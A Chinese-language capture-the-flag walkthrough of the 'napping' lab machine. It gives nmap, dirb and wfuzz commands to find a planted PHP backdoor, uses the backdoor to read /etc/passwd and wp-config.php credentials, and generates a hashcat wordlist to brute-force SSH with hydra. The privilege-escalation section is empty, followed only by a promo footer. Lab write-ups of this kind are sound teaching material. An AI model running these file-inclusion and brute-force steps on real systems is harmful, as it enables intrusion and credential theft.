本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关
主机信息
kali:192.168.31.9
napping:192.168.31.92
信息收集
使用Nmap探测目标主机发现开放22、80两个端口
nmap -A -p- 192.168.31.90
dirb http://192.168.31.92/
查看页面内容,并没有提供有价值的线索
继续查看网站首页看到提示“网站被黑了,你永远找不到后门”
我们尝试使用SecLists中的CommonBackdoors-PHP.fuzz.txt扫描发现存在一个后门文件状态码为500
dirbdirb http://192.168.31.92/ CommonBackdoors-PHP.fuzz.txt
GETSHELL
然后我们通过fuzz获得后门的参数是key
wfuzz -u "http://192.168.31.92/NetworkFileManagerPHP.php?FUZZ=/etc/passwd" -w fuzz-lfi-params-list.txt --hw 0
浏览器访问获得数据
然后我们包含当前的后门文件查看一下源码
解码后有一行提示说那些密码不能帮助我们,hashcat说规则就是规则
然后我们尝试包含一下wordpress的配置文件wp-config.php
解码后获得数据库的用户名和密码
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'john' );
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
对比/etc/passwd文件发现有一个用户和数据库用户名一样
根据后门文件中的提示,尝试登录了一下果然登录失败
首先将或的数据库密码写入文件
然后利用hashcat的规则生成一个密码文件
hashcat --stdout passwd -r /usr/share/hashcat/rules/best.rule > passlist.txt
然后通过爆破得到密码
hydra -l john -P passlist.txt ssh://192.168.31.92
使用密码登录john的账户
提权
加入我的星球
下方查看历史文章
扫描二维码
获取更多精彩
NowSec